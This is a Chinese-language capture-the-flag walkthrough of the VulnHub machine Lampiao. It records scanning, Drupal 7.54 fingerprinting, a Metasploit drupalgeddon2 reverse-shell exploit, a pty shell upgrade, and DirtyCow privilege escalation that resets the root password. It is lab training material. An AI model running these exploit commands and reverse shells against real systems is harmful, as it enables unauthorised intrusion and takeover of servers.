Lampiao

靶机说明

https://www.vulnhub.com/entry/lampiao-1,249/

主机探测

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:20 CST
Nmap scan report for 192.168.2.1
Host is up (0.00068s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00043s latency).
MAC Address: 08:00:27:07:6D:A0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.10
Host is up (0.00067s latency).
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.07 seconds

nmap扫描

（1）进行端口扫描

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.2.10 -oA nmapscan/ports            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:22 CST
Nmap scan report for 192.168.2.10
Host is up (0.0021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.19 seconds

• 发现开放端口22,80,1898
  （2）对端口细节进行扫描

  ┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
  └─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80,1898 192.168.2.10 -oA nmapscan/detail
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:25 CST
  Nmap scan report for 192.168.2.10
  Host is up (0.0011s latency).
  
  PORT     STATE SERVICE VERSION
  22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
  80/tcp   open  http?
  1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port80-TCP:V=7.94SVN%I=7%D=2/8%Time=67A6C09D%P=x86_64-pc-linux-gnu%r(NU
  SF:LL,1179,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\
  SF:\|_\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|\\
  SF:__,_\|_\|\x20\|_\|");
  MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)
  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  Device type: general purpose
  Running: Linux 3.X|4.X
  OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  OS details: Linux 3.2 - 4.9
  Network Distance: 1 hop
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 52.18 seconds

  （3）进行UDP扫描

  ┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
  └─$ sudo nmap -sU -p22,80,1898 192.168.2.10 -oA nmapscan/udp                   
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:29 CST
  Nmap scan report for 192.168.2.10
  Host is up (0.00095s latency).
  
  PORT     STATE  SERVICE
  22/udp   closed ssh
  80/udp   closed http
  1898/udp closed cymtec-port
  MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)
  
  Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds

• 没有开放的udp端口
  （4）进行漏洞扫描

  ┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
  └─$ sudo nmap --script=vuln -p22,80,1898 192.168.2.10 -oA nmapscan/vuln
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:29 CST
  Nmap scan report for 192.168.2.10
  Host is up (0.0012s latency).
  
  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
  |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  1898/tcp open  cymtec-port
  MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)
  
  Nmap done: 1 IP address (1 host up) scanned in 49.75 seconds

• 没有扫描出漏洞

web渗透

80端口渗透

（1）访问80端口，是一个静态页面，查看页面源码，没有发现有用的信息

（2）进行目录扫描

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo gobuster dir -u http://192.168.2.10 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.10
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to http://192.168.2.10/: Get "http://192.168.2.10/": read tcp 192.168.2.4:38794->192.168.2.10:80: read: connection reset by peer

• 发现无法连接到80端口

1898端口渗透

（1）访问1898端口，发现使用的cms是drupal

（2）对1898端口进行目录扫描

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo gobuster dir -u http://192.168.2.10:1898 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.10:1898
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 286]
/.php                 (Status: 403) [Size: 285]
/misc                 (Status: 301) [Size: 317] [--> http://192.168.2.10:1898/misc/]
/themes               (Status: 301) [Size: 319] [--> http://192.168.2.10:1898/themes/]
/modules              (Status: 301) [Size: 320] [--> http://192.168.2.10:1898/modules/]
/scripts              (Status: 301) [Size: 320] [--> http://192.168.2.10:1898/scripts/]
/index.php            (Status: 200) [Size: 11400]
/sites                (Status: 301) [Size: 318] [--> http://192.168.2.10:1898/sites/]
/includes             (Status: 301) [Size: 321] [--> http://192.168.2.10:1898/includes/]
/profiles             (Status: 301) [Size: 321] [--> http://192.168.2.10:1898/profiles/]
/update.php           (Status: 403) [Size: 4129]
/install.php          (Status: 200) [Size: 3257]
/robots.txt           (Status: 200) [Size: 2189]
/cron.php             (Status: 403) [Size: 7390]
/xmlrpc.php           (Status: 200) [Size: 42]
/.php                 (Status: 403) [Size: 285]
/.html                (Status: 403) [Size: 286]
/server-status        (Status: 403) [Size: 294]
/authorize.php        (Status: 403) [Size: 2896]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================

• 发现挺多的敏感文件，访问robots.txt，找到CHANGELOG.txt
  

• 发现该框架drupal的版本信息为7.54，时间为2017年2月1日
  

cms-drupal渗透

（1）通过上述的渗透，最终确认该系统使用的CMS是drupal，版本为7.54，时间为2017-02-01，通过Google搜索17年以后的漏洞或者使用msf进行搜索

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ msfconsole    
Metasploit tip: Use the edit command to open the currently active module 
in your editor
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.4.20-dev                          ]
+ -- --=[ 2440 exploits - 1256 auxiliary - 429 post       ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search drupal

Matching Modules
================

   #   Name                                                              Disclosure Date  Rank       Check  Description
   -   ----                                                              ---------------  ----       -----  -----------
   0   exploit/unix/webapp/drupal_coder_exec                             2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1   exploit/unix/webapp/drupal_drupalgeddon2                          2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2     \_ target: Automatic (PHP In-Memory)                            
   3     \_ target: Automatic (PHP Dropper)                              
   4     \_ target: Automatic (Unix In-Memory)                           
   5     \_ target: Automatic (Linux Dropper)                            
   6     \_ target: Drupal 7.x (PHP In-Memory)                           
   7     \_ target: Drupal 7.x (PHP Dropper)                             
   8     \_ target: Drupal 7.x (Unix In-Memory)                          
   9     \_ target: Drupal 7.x (Linux Dropper)                           
   10    \_ target: Drupal 8.x (PHP In-Memory)                           
   11    \_ target: Drupal 8.x (PHP Dropper)                             
   12    \_ target: Drupal 8.x (Unix In-Memory)                          
   13    \_ target: Drupal 8.x (Linux Dropper)                           
   14    \_ AKA: SA-CORE-2018-002                                        
   15    \_ AKA: Drupalgeddon 2                                          
   16  exploit/multi/http/drupal_drupageddon                             2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   17    \_ target: Drupal 7.0 - 7.31 (form-cache PHP injection method)  
   18    \_ target: Drupal 7.0 - 7.31 (user-post PHP injection method)   
   19  auxiliary/gather/drupal_openid_xxe                                2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   20  exploit/unix/webapp/drupal_restws_exec                            2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   21  exploit/unix/webapp/drupal_restws_unserialize                     2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   22    \_ target: PHP In-Memory                                        
   23    \_ target: Unix In-Memory                                       
   24  auxiliary/scanner/http/drupal_views_user_enum                     2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   25  exploit/unix/webapp/php_xmlrpc_eval                               2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

Interact with a module by name or index. For example info 25, use 25 or use exploit/unix/webapp/php_xmlrpc_eval

（2）结合搜集到信息，选择drupal_drupalgeddon2 2018-03-28

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

（3）进行相关的设置

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.2.4
lhost => 192.168.2.4
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.2.10
rhost => 192.168.2.10
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show option
sf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.2.4:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.2.10
[*] Meterpreter session 1 opened (192.168.2.4:4444 -> 192.168.2.10:45742) at 2025-02-08 11:20:51 +0800

meterpreter > 

（4）输入shell，成功进行连接

meterpreter > shell
Process 4974 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

（5）获取稳定的shell

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ 

提权-dirtycow

（1）使用脚本linux-exploit-suggester.sh进行提权，将脚本上传至临时目录

meterpreter > upload /miao/vulnhub/lampiao/linux-exploit-suggester.sh /tmp/1.sh
[*] Uploading  : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Uploaded -1.00 B of 88.80 KiB (-0.0%): /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Completed  : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
meterpreter > 

（2）进行命令交互界面，给脚本添加执行权限，并执行

meterpreter > shell
Process 5651 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ cd /tmp
cd /tmp
www-data@lampiao:/tmp$ chmod +x 1.sh    
chmod +x 1.sh
www-data@lampiao:/tmp$ ./1.sh
./1.sh

（3）根据执行的结果，选择相关的漏洞进行利用（一般选择有颜色的进行利用）

（4）选择CVE-2016-5195进行利用

• 利用脚本：https://github.com/gbonacini/CVE-2016-5195，将脚本上传至目录/tmp

  meterpreter > upload /miao/vulnhub/lampiao/CVE-2016-5195-master/ /tmp/

• 对dcow.cpp进行编译

  www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

  （5）执行dcow，对密码进行重置

  www-data@lampiao:/tmp$ ./dcow
  ./dcow
  Running ...
  Received su prompt (Password: )
  Root password is:   dirtyCowFun
  Enjoy! :-)

  （6）切换到root用户

  www-data@lampiao:/tmp$ su root
  su root
  Password: dirtyCowFun
  
  root@lampiao:/tmp#

读取flag

root@lampiao:~# cat /root/flag.txt
cat /root/flag.txt
9740616875908d91ddcdaa8aea3af366

总结

（1）主要是对CMS，drupal的漏洞进行利用以及如何使用msf
（2）dirtrydcow提权的方法，主要是对root的密码进行重置
（3）使用python获取稳定的shell

python -c 'import pty;pty.spawn("/bin/bash")'